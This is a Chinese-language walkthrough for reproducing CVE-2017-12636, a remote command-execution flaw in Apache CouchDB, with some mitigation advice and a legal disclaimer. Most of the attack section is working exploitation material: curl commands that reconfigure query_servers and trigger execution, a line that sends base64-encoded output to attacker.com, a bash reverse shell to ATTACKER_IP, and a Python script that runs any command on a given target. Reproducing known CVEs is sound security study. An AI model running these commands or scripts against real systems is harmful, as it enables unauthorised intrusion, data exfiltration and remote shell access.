如何进行couchdb 任意命令执行漏洞CVE-2017-12636复现

# 如何进行CouchDB 任意命令执行漏洞CVE-2017-12636复现

## 漏洞概述

CVE-2017-12636是Apache CouchDB中的一个高危安全漏洞，该漏洞允许攻击者通过精心构造的HTTP请求在目标服务器上执行任意操作系统命令。此漏洞影响CouchDB 1.7.0至2.1.1版本，由于Erlang脚本引擎对JavaScript处理不当导致。

### 漏洞原理
CouchDB的查询服务器(`couchjs`)在处理特定JSON数据时，未能正确验证用户输入，使得攻击者可以通过`_config` API修改运行时配置，最终实现远程代码执行(RCE)。

## 环境准备

### 所需工具
1. **漏洞环境**：  
   - 安装受影响版本的CouchDB（推荐使用Docker快速搭建）：
     ```bash
     docker run -d -p 5984:5984 --name vulncouch couchdb:2.1.0
     ```
2. **测试工具**：  
   - cURL或Postman（用于发送HTTP请求）
   - Python3（可选，用于编写自动化脚本）

### 配置检查
确保CouchDB服务正常运行：
```bash
curl http://localhost:5984/

预期返回类似：

{"couchdb":"Welcome","version":"2.1.0"}

漏洞复现步骤

步骤1：验证未授权访问

默认配置下，CouchDB可能允许未授权访问/_config接口：

curl http://localhost:5984/_config

若返回大量配置信息，说明存在未授权访问风险。

步骤2：利用query_server配置

通过修改query_server配置实现命令注入：

curl -X PUT http://localhost:5984/_config/query_servers/cmd \
  -d '"/sbin/ifconfig > /tmp/exploit && curl http://attacker.com/exfiltrate?data=$(cat /tmp/exploit | base64)"' \
  -H "Content-Type: application/json"

步骤3：创建恶意设计文档

构造包含命令执行的临时视图：

curl -X PUT 'http://localhost:5984/testdb' 
curl -X PUT http://localhost:5984/testdb/_design/exploit \
  -d '{"_id":"_design/exploit","views":{"cmd":{"map":""} },"language":"cmd"}' \
  -H "Content-Type: application/json"

步骤4：触发命令执行

通过查询视图触发命令：

curl -X GET http://localhost:5984/testdb/_design/exploit/_view/cmd

步骤5：验证执行结果

检查命令是否成功执行：

docker exec vulncouch ls /tmp

应能看到生成的exploit文件。

漏洞分析

关键攻击点

1. _config API暴露：允许修改运行时配置
2. 动态语言加载：通过language字段指定自定义命令处理器
3. 缺乏输入过滤：未对query_servers参数进行安全校验

利用链示意图

sequenceDiagram
    attacker->>+CouchDB: PUT /_config/query_servers/cmd
    CouchDB-->>-attacker: 200 OK
    attacker->>+CouchDB: PUT /db/_design/exploit
    CouchDB-->>-attacker: 201 Created
    attacker->>+CouchDB: GET /db/_design/exploit/_view/cmd
    CouchDB->>+System: 执行配置的命令
    System-->>-CouchDB: 命令输出
    CouchDB-->>-attacker: 500 Error (包含部分输出)

防御措施

临时解决方案

1. 升级到CouchDB 2.1.2或更高版本
2. 配置HTTP反向代理限制/_config访问：

   
   location ~ ^/_config {
      deny all;
   }
   

3. 启用管理员认证：

   
   [admins]
   admin = mypassword
   

长期建议

• 遵循最小权限原则运行CouchDB
• 定期审计配置文件和API访问日志
• 使用网络隔离限制数据库服务器出站连接

扩展实验

反弹Shell利用

修改query_servers配置建立反向连接：

curl -X PUT http://localhost:5984/_config/query_servers/cmd \
  -d '"bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' \
  -H "Content-Type: application/json"

自动化利用脚本

import requests
import sys

def exploit(target, cmd):
    config_url = f"{target}/_config/query_servers/cmd"
    requests.put(config_url, data=f'"{cmd}"', headers={"Content-Type":"application/json"})
    
    db_url = f"{target}/exploit_db"
    requests.put(db_url)
    
    doc_url = f"{db_url}/_design/exploit"
    requests.put(doc_url, json={
        "_id": "_design/exploit",
        "views": {"cmd": {"map": ""}},
        "language": "cmd"
    })
    
    trigger_url = f"{doc_url}/_view/cmd"
    requests.get(trigger_url)

if __name__ == "__main__":
    exploit(sys.argv[1], sys.argv[2])

法律与道德声明

1. 本实验仅限授权环境测试
2. 禁止用于真实生产环境
3. 漏洞披露应遵循负责任的披露流程
4. 未经授权的渗透测试可能违反《网络安全法》

参考资源

1. CVE-2017-12636官方公告
2. Apache CouchDB安全指南
3. Erlang安全编程规范

”`

注：实际复现时请替换ATTACKER_IP等占位符，并确保在合法授权环境下操作。文章长度可通过增加以下内容扩展： - 详细错误分析 - 不同版本的影响差异 - 企业级防护方案 - 入侵检测规则示例